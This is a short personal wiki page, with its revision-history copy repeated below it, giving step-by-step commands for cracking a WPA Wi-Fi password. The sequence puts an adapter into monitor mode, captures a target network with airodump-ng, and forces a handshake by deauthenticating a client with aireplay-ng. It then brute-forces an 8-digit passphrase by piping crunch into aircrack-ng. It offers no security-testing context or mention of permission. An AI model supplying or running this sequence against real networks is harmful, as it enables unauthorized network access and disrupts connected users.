Website/HowtoCrackWPA.page

# Monitor mode
For my RTL8188EUS:

```
ip link set wlanX down
iw dev wlanX set type monitor
```

# Scan networks

All channels:
```
airodump-ng wlanX
```
Specific channel:
```
airodump-ng -c 6 wlanX
```

# Save a capture of chosen BSSID

```
airodump-ng -c 6 --bssid 00:23:B1:82:08:xx -w <filename> wlanX
```

You need to wait for a client to connect, or to deauth it and get the 4-way handshake.
```
aireplay-ng -0 1 -a 00:23:B1:82:0C:xx -c D0:37:45:2F:52:xx wlanX
```
`-a` is access point  
`-c` is client  

Then you should have an EAPOL/WPA handshake.

# Crack WPA passphrase

## For a 8 digits scheme

crunch 8 8 0123456789 -s 00000000 | aircrack-ng -w - -b 00:23:B1:82:08:xx <filename>.cap
init 2020-10-27 06:39:08 +00:00			`# Monitor mode`
			`For my RTL8188EUS:`

			```
			`ip link set wlanX down`
			`iw dev wlanX set type monitor`
			```

			`# Scan networks`

			`All channels:`
			```
			`airodump-ng wlanX`
			```
			`Specific channel:`
			```
			`airodump-ng -c 6 wlanX`
			```

			`# Save a capture of chosen BSSID`

			```
			`airodump-ng -c 6 --bssid 00:23:B1:82:08:xx -w <filename> wlanX`
			```

			`You need to wait for a client to connect, or to deauth it and get the 4-way handshake.`
			```
			`aireplay-ng -0 1 -a 00:23:B1:82:0C:xx -c D0:37:45:2F:52:xx wlanX`
			```
			`-a` is access point
			`-c` is client

			`Then you should have an EAPOL/WPA handshake.`

			`# Crack WPA passphrase`

			`## For a 8 digits scheme`

			`crunch 8 8 0123456789 -s 00000000 \| aircrack-ng -w - -b 00:23:B1:82:08:xx <filename>.cap`